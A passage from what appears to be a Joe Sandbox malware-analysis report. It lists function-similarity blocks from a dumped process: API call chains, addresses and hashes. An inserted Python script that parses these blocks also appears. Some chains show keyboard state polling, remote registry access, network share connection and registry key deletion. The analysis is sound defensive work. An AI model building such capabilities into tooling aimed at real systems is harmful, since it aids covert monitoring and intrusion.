• GetMenuItemID.USER32(?,?), ref: 00B4CA90
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B4CAD6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B4CAEB
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B4CB0C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep
• String ID: 0
• API String ID: 1460738036-4108050209
• Opcode ID: 3385d99d0f02acbc94957fb17cea1000a9218f712a6f5a4554dde0d094bce235
• Instruction ID: c94d4272d5d58630f7e963da2ade555faa632ec2248cfbcd0252c730822cb29c
• Opcode Fuzzy Hash: 3385d99d0f02acbc94957fb17cea1000a9218f712a6f5a4554dde0d094bce235
• Instruction Fuzzy Hash: 96619B70A02249AFDF51CF64C889AFE7FF8FB05788F040195E911A3291DB30AE40EB61
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B4E4D4
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B4E4FA
• _wcslen.LIBCMT ref: 00B4E504
• _wcsstr.LIBVCRUNTIME ref: 00B4E554
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B4E570
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
• Opcode ID: 9a1fbed216260290908bfb1088b78e98e58f09f27261c937bcd7db36825467f8
• Instruction ID: 20eec9f4eeac8ea9b9975c294480c4d5a0dd59cd25a04feba06819469d7b8e3c
• Opcode Fuzzy Hash: 9a1fbed216260290908bfb1088b78e98e58f09f27261c937bcd7db36825467f8
• Instruction Fuzzy Hash: BA41F2726482047AEB05AB648C47EBF7BECEF65750F0040E9F904B60D2EF74DA01A6A5
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B6D6C4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B6D6ED
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B6D7A8
  • Part of subcall function 00B6D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B6D70A
  • Part of subcall function 00B6D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B6D71D
  • Part of subcall function 00B6D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B6D72F
  • Part of subcall function 00B6D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B6D765
  • Part of subcall function 00B6D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B6D788
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00B6D753
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                    • Opcode ID: 1592c09bc53060397380c3071248ff0d18fa2d1fa611a6077d4960e22edfe265
                                                                                                                                                                                                                                                                                    • Instruction ID: 0d26ee9dbaec06c50ce16d05ecc001fed9b08837b69b903031478596d7de6dcc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1592c09bc53060397380c3071248ff0d18fa2d1fa611a6077d4960e22edfe265
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4317272E01129BBD7219B50DC88EFFBBBCEF46750F0001A5F905E3150DB789E459AA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00B4EFCB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFF215: timeGetTime.WINMM(?,?,00B4EFEB), ref: 00AFF219
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00B4EFF8
                                                                                                                                                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00B4F01C
                                                                                                                                                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B4F03E
                                                                                                                                                                                                                                                                                    • SetActiveWindow.USER32 ref: 00B4F05D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B4F06B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B4F08A
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00B4F095
                                                                                                                                                                                                                                                                                    • IsWindow.USER32 ref: 00B4F0A1
                                                                                                                                                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00B4F0B2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                    • Opcode ID: 89ba0719cd4d7e2d3ac07d6eb287965253911371aa5c2047a1dd8eb82ffd1717
                                                                                                                                                                                                                                                                                    • Instruction ID: 5a6504429d109b16c5e452ee5fecb2cf131c0757b70898350714e80df1a67098
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ba0719cd4d7e2d3ac07d6eb287965253911371aa5c2047a1dd8eb82ffd1717
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6218171504205BFE7116F60EC89B267BFAFB99B95B000165F50A93372CFB18E84A661
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B4F374
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B4F38A
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4F39B
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B4F3AD
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B4F3BE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                    • Opcode ID: e276f54b840517c6657d026072698d09bac40e18abfa49e91d675c6029365243
                                                                                                                                                                                                                                                                                    • Instruction ID: 2bee9344836b68c18b364275bc55c94d6836e0e36d0af94cc637b337ea318714
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e276f54b840517c6657d026072698d09bac40e18abfa49e91d675c6029365243
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D118632AD819979D720A766CC4AEFF6AFCEFD2B40F4004AA7401E30E1DEA05E45C5B1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B4A9D9
                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00B4AA44
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00B4AA64
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00B4AA7B
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00B4AAAA
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00B4AABB
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00B4AAE7
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00B4AAF5
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00B4AB1E
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00B4AB2C
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00B4AB55
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00B4AB63
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: cf9032694fcc8f3cbe448bda3773152f7f9077c65093340d79fed5735fd67337
• Instruction ID: 2388c3399d550765c463d108fa1b4e6a7c1fa3d27ca5c96bff4f04e29c99f23c
• Opcode Fuzzy Hash: cf9032694fcc8f3cbe448bda3773152f7f9077c65093340d79fed5735fd67337
• Instruction Fuzzy Hash: 4E51C460A4478429FB35D7A48950BEABFF5DF11380F0845DDC5C25B1C2DA649B8CD763
APIs
• GetDlgItem.USER32(?,00000001), ref: 00B46649
• GetWindowRect.USER32(00000000,?), ref: 00B46662
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B466C0
• GetDlgItem.USER32(?,00000002), ref: 00B466D0
• GetWindowRect.USER32(00000000,?), ref: 00B466E2
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B46736
• GetDlgItem.USER32(?,000003E9), ref: 00B46744
• GetWindowRect.USER32(00000000,?), ref: 00B46756
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B46798
• GetDlgItem.USER32(?,000003EA), ref: 00B467AB
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B467C1
• InvalidateRect.USER32(?,00000000,00000001), ref: 00B467CE
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 47ba609e6df3dc39bc7c12910fea6652f7ee99f21d55686fdd86cbf28d626a68
• Instruction ID: 657749f6f2e14d3c445d9b9e7ee49e294fd04f8660fed4eb1e0e83eebc56c943
• Opcode Fuzzy Hash: 47ba609e6df3dc39bc7c12910fea6652f7ee99f21d55686fdd86cbf28d626a68
• Instruction Fuzzy Hash: E3511FB1A00205AFDF18CF68DD85AAEBBB5FF49314F108169F919E7290DB70AE44CB50
APIs
  • Part of subcall function 00AE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE1488,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00AE1865
• DestroyWindow.USER32(?), ref: 00AE1521
• KillTimer.USER32(00000000,?,?,?,?,00AE145A,00000000,?), ref: 00AE15BB
• DestroyAcceleratorTable.USER32(00000000), ref: 00B229B4
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00B229E2
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00B229F9
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AE145A,00000000), ref: 00B22A15
• DeleteObject.GDI32(00000000), ref: 00B22A27
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 4be6329ef03d3c0989fcc71143ab854948830d2d1167bd46fefd7ff335866eab
• Instruction ID: 9c94dbb37471cf2f7c75741c5676f89c2e9629ba27d41dc4f90ed6b6ad0e5399
• Opcode Fuzzy Hash: 4be6329ef03d3c0989fcc71143ab854948830d2d1167bd46fefd7ff335866eab
• Instruction Fuzzy Hash: 12616A31501761EFDB399F15D948B2A77F1FF81312F109269E09B97AA0CB70A891CF90
APIs
  • Part of subcall function 00AE2234: GetWindowLongW.USER32(?,000000EB), ref: 00AE2242
• GetSysColor.USER32(0000000F), ref: 00AE2152
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 982bad99b21c15f54a7be6eff869575a6b1ce487ce179859591e65fad4b36530
• Instruction ID: 090989f1f7f54e3b9b09c9c09beda62e979c9844da3deccf555c8b794028cef3
• Opcode Fuzzy Hash: 982bad99b21c15f54a7be6eff869575a6b1ce487ce179859591e65fad4b36530
• Instruction Fuzzy Hash: D041B131100690AFDB205F399C48BB937B9EF46770F544355FAAA9B2E1CB319E82DB11
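The API lists in these blocks are the raw material behind each similarity entry: one line per call site, giving Api.MODULE, the argument or stack values Joe Sandbox captured at the call, and the address of the call instruction, while the Memory Dump Source line gives the base at which the dumped image was loaded. The following Python is an added example and is not part of the Joe Sandbox report or its IDA plugin. It parses such lines into records, rebases the call-site addresses to offsets from the dump base (0x00AE0000 here, the same value as the ae0000 in the snapshot file name hcaresult_10_2_ae0000_Dry.jbxd) so they can be matched against a loaded copy of the dump, and flags argument values that fall inside the image (such as 00AE145A and 00AE1488 above), which are most likely return addresses read off the stack rather than real API parameters. The sample block is copied from the third function above; the image_end bound 0x00BB5000 is an assumption taken from the start of the last associated dump listed, and the dotted fields of the .sdmp file name are deliberately not interpreted because the report does not document them.

```python
"""Parse the 'APIs' and 'Memory Dump Source' lines of a Joe Sandbox
function-similarity block and rebase call sites against the dump base.

Added example; not code from Joe Sandbox. Only the explicit 'Offset:'
value is used as the base, the .sdmp name fields are left untouched.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: lines copied from the third similarity block above.
SAMPLE_BLOCK = """\
APIs
  • Part of subcall function 00AE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE1488,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00AE1865
• DestroyWindow.USER32(?), ref: 00AE1521
• KillTimer.USER32(00000000,?,?,?,?,00AE145A,00000000,?), ref: 00AE15BB
• DestroyAcceleratorTable.USER32(00000000), ref: 00B229B4
• DeleteObject.GDI32(00000000), ref: 00B22A27
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
"""

# "• [Part of subcall function XXXXXXXX: ]Api.MODULE[(args)][,] ref: XXXXXXXX"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
SRC_RE = re.compile(
    r"^\s*•\s*Source File:\s*(?P<dump>\S+?\.sdmp),\s*Offset:\s*(?P<base>[0-9A-Fa-f]{8}),"
    r"\s*based on PE:\s*(?P<pe>true|false)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]      # None where the report prints '?'
    ref: int                       # call-site VA inside the dumped process
    parent: Optional[int] = None   # owner when the report nests the call


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    dump: Optional[str] = None
    base: Optional[int] = None
    based_on_pe: Optional[bool] = None


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16)            # "-00000005" parses as -5


def parse_block(text: str) -> FunctionBlock:
    blk = FunctionBlock()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [_parse_arg(t) for t in raw.split(",")] if raw else []
            parent = int(m.group("parent"), 16) if m.group("parent") else None
            blk.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                     int(m.group("ref"), 16), parent))
            continue
        m = SRC_RE.match(line)
        if m:
            blk.dump = m.group("dump")
            blk.base = int(m.group("base"), 16)
            blk.based_on_pe = m.group("pe") == "true"
    return blk


def api_chain(blk: FunctionBlock) -> List[str]:
    """Ordered, de-duplicated Api.MODULE names of the direct calls only."""
    seen: List[str] = []
    for c in blk.calls:
        name = f"{c.api}.{c.module}"
        if c.parent is None and name not in seen:
            seen.append(name)
    return seen


def rebase(blk: FunctionBlock) -> Dict[int, int]:
    """Map each call-site VA to its offset from the dump base."""
    assert blk.base is not None, "block has no Memory Dump Source line"
    return {c.ref: c.ref - blk.base for c in blk.calls}


def image_pointer_args(blk: FunctionBlock, image_end: int) -> Dict[int, List[int]]:
    """Argument values inside [base, image_end): code pointers captured from
    the stack, not genuine parameters. image_end is supplied by the caller."""
    assert blk.base is not None
    out: Dict[int, List[int]] = {}
    for c in blk.calls:
        hits = [a for a in c.args if a is not None and blk.base <= a < image_end]
        if hits:
            out[c.ref] = hits
    return out


if __name__ == "__main__":
    b = parse_block(SAMPLE_BLOCK)
    print("chain:", " -> ".join(api_chain(b)))
    for va, off in rebase(b).items():
        print(f"  {va:08X} = base+{off:06X}")
    print("stack pointers:", {f"{k:08X}": [f"{v:08X}" for v in vs]
                              for k, vs in image_pointer_args(b, 0x00BB5000).items()})
```

Feed it a whole report page split on the "APIs" label to rebuild the API chain of every function; the rebased offsets line up with a copy of the .sdmp loaded at its Offset in IDA, and the flagged stack values give the caller addresses of each subcall.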
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00B30D31,00000001,0000138C,00000001,00000000,00000001,?,00B5EEAE,00BB2430), ref: 00B4A091
• LoadStringW.USER32(00000000,?,00B30D31,00000001), ref: 00B4A09A
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00B30D31,00000001,0000138C,00000001,00000000,00000001,?,00B5EEAE,00BB2430,?), ref: 00B4A0BC
• LoadStringW.USER32(00000000,?,00B30D31,00000001), ref: 00B4A0BF
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B4A1E0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                    • Opcode ID: c0d6b882c892744b5f2145cb7f87141ae8e92c4f1ce8ecd8bfe90412f873f1f8
                                                                                                                                                                                                                                                                                    • Instruction ID: 2e5163ff028a5f0c2995ef892f7e224d35519c079bc8d2ae69a6881cda2ea76c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0d6b882c892744b5f2145cb7f87141ae8e92c4f1ce8ecd8bfe90412f873f1f8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D419072844149AACB01EBE1DE86DEFB7B8AF18340F1004A5B505B20A2EF756F49DB61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B41093
                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B410AF
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B410CB
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B410F5
                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B4111D
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B41128
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B4112D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
